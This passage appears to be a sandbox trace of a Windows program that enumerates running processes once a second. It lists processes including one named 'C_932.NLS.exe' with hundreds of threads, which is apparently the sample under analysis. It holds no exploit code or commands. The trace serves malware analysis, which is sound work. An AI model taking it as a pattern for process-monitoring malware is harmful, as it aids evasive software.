cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0041.417] CloseHandle (hObject=0x2f8) returned 1 [0041.417] Sleep (dwMilliseconds=0x3e8) [0042.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c8 [0043.999] Process32FirstW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.002] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.005] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.008] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.010] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.013] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.016] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.018] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.022] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.026] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0044.029] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.032] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.035] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.037] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.040] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.043] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.389] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.819] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.822] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.824] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.827] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.830] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.834] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x175, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0045.838] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0045.840] Process32NextW (in: hSnapshot=0x6c8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0045.843] CloseHandle (hObject=0x6c8) returned 1 [0045.843] Sleep (dwMilliseconds=0x3e8) [0047.568] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4b4 [0048.254] Process32FirstW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0048.256] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0048.260] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0048.262] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.265] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0048.267] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.270] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0048.272] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0048.275] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0048.277] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0048.279] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.285] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.288] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.291] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.293] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.296] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.298] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.301] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0048.303] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0048.307] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0048.309] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.312] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.315] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x142, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0048.317] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0049.461] Process32NextW (in: hSnapshot=0x4b4, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0049.542] CloseHandle (hObject=0x4b4) returned 1 [0049.542] Sleep (dwMilliseconds=0x3e8) [0051.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x700 [0051.080] Process32FirstW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0051.084] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.090] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.093] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.097] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.100] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.104] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.108] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.111] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.321] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0051.325] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.328] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.331] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.335] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.338] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.341] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.344] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.349] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.352] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0051.355] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0051.515] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.519] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0051.522] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="C_932.NLS.exe")) returned 1 [0051.526] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0051.530] Process32NextW (in: hSnapshot=0x700, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0051.533] CloseHandle (hObject=0x700) returned 1 [0051.533] Sleep (dwMilliseconds=0x3e8) [0053.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0053.596] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.599] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.603] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.606] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.610] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.614] Process32NextW (in: hSnapshot=0x1b8, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, 